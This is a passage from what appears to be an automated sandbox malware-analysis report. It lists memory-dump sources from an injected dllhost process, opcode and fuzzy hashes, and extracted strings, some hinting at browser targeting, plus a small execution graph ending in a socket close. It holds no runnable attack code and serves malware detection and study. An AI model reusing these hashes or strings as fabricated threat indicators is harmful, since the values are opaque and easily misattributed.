                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 728e58ab261e987a98d1d05a7604443950645b2b8985ebde18c5485f6841c4b6
                                                      • Instruction ID: 3fd9a1edaf379f3fb96cb60064781e023ab59b7e207dec2690491384df5979ef
                                                      • Opcode Fuzzy Hash: 728e58ab261e987a98d1d05a7604443950645b2b8985ebde18c5485f6841c4b6
                                                      • Instruction Fuzzy Hash: 86510635A0031DAEEF10EBE9DC85BAE77A9EF04304F4800E9F615EB681E7709A45CB51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 8da553665589fe1e2ee3617bf35ff440f43b0d6d00c0670b2d881e105068163f
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 45818C74E062499FDF2ACEE8C8917AEBBA6AF65350F1C41D9FC61E7290C6349840CB51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412290629.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3680000_dllhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C$EFOX$INTO$L$iNTE$mOZI
                                                      • API String ID: 0-2980633949
                                                      • Opcode ID: 4833fdd3d94ba7b434e2343a5ca76f18e8e8af3541218b1a8f011b736c8dc800
                                                      • Instruction ID: 8be2d4ab4dba01ee41d4efa672e9f14c9411d967a0c51ef31e5d335bef914341
                                                      • Opcode Fuzzy Hash: 4833fdd3d94ba7b434e2343a5ca76f18e8e8af3541218b1a8f011b736c8dc800
                                                      • Instruction Fuzzy Hash: 581112B0C0464C8ADB10DFD1E5482EEFBB1FB04304F614159D55ABF241DBB949458F89
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038802E7
                                                      • RTL: Re-Waiting, xrefs: 0388031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038802BD
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: c59aa909f498b93e194c199de2d815613201e7aee7a21b22da2c4a0c74840ef2
                                                      • Instruction ID: e1b9d10b26858cec81b3109f3c9a83350043f157a5ef87ef513cb3058f84bf73
                                                      • Opcode Fuzzy Hash: c59aa909f498b93e194c199de2d815613201e7aee7a21b22da2c4a0c74840ef2
                                                      • Instruction Fuzzy Hash: 25E1A175A04741AFD725DFA8C884B2AB7E0BB85314F180A9DF5A5CB3E1D774D844CB82
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03887B7F
                                                      • RTL: Re-Waiting, xrefs: 03887BAC
                                                      • RTL: Resource at %p, xrefs: 03887B8E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 56444b8e819d232ec38d643d4aa4d6f8c9f56aeae28450b70d927904cdc1eecc
                                                      • Instruction ID: b7c67b77407224e4d9a3ed1e703c2330f38538d7a5886cce8087a02cd7e9a90b
                                                      • Opcode Fuzzy Hash: 56444b8e819d232ec38d643d4aa4d6f8c9f56aeae28450b70d927904cdc1eecc
                                                      • Instruction Fuzzy Hash: 5C4107353007069FDB25DFA9C840B6AB7E5EF88710F140A9DF99ADB680DB31E805CB91
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0388728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 038872C1
                                                      • RTL: Resource at %p, xrefs: 038872A3
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03887294
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 7c2d5460556b5531dc25fd29b75365ff4ff9f347d3d6718fed039c99ae9930f6
                                                      • Instruction ID: 5fa139a2f723d5a5b5aba2c07c075b85f57f16b748eee10b33be7226f45a0e5b
                                                      • Opcode Fuzzy Hash: 7c2d5460556b5531dc25fd29b75365ff4ff9f347d3d6718fed039c99ae9930f6
                                                      • Instruction Fuzzy Hash: 5141033560024AABD711EFB8CC41B6AB7A5FB44714F240699F995DB640DB21E841C7D1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 0382ea60d47b78b08c9bc9bfdb872a06fb4dc3f89088065320478fc16ba6c64a
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: BB91C271E0031A9BDF24DEE9C880ABEB7A5AF44720F58859AFC65E72C0E7309940CB51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: f31c1675fca03a7fdc3413b4c893549b913344d9144384a75b6034bd8152520c
                                                      • Instruction ID: 28992a0dfd8021b2ba95009fee1cc6b24fbb74253f212efb204f6609b364213b
                                                      • Opcode Fuzzy Hash: f31c1675fca03a7fdc3413b4c893549b913344d9144384a75b6034bd8152520c
                                                      • Instruction Fuzzy Hash: 80813875D002699BDB35DB94CC44BEAB7B8AB08710F0445EAE919F7280D7309E84CFA1
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0389CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                      • Associated: 0000000B.00000002.3412398203.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_37e0000_dllhost.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Cw@4Cw
                                                      • API String ID: 4062629308-3101775584
                                                      • Opcode ID: cbe6a9613eb002cf199b21811d3503eff3c703d1817b679e4234a4ad7f5f718b
                                                      • Instruction ID: f3d3e0851aac3e66c47720c675e4afef71195bdc3d7485b266047a1df0143eff
                                                      • Opcode Fuzzy Hash: cbe6a9613eb002cf199b21811d3503eff3c703d1817b679e4234a4ad7f5f718b
                                                      • Instruction Fuzzy Hash: 2D419B79900328DFDB21DFE9C840AAEBBB8EF44B04F0840AAE914DF254D774D845CB65

                                                      Execution Graph

                                                      Execution Coverage:2.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:3
                                                      Total number of Limit Nodes:0
                                                      execution_graph 13531 5476448 13532 5476465 13531->13532 13533 5476474 closesocket 13532->13533

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 5476448-5476482 call 544e038 call 5477038 closesocket
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_53e0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID:
                                                      • API String ID: 2781271927-0
                                                      • Opcode ID: fd973bfd5b8a3dfc80a43eb4cf43fbb5c76ee0e0d95a190935ee3e4f08dc587b
                                                      • Instruction ID: c1c8e9521e0614d240d1fcfffa2c77fd8db6d05420fea0822a70b6c0168081b4
                                                      • Opcode Fuzzy Hash: fd973bfd5b8a3dfc80a43eb4cf43fbb5c76ee0e0d95a190935ee3e4f08dc587b
                                                      • Instruction Fuzzy Hash: 41E08C362416187BE220EB5ADC04CDB77ACEFC9354B80405EFA08A7241C671B9158BF1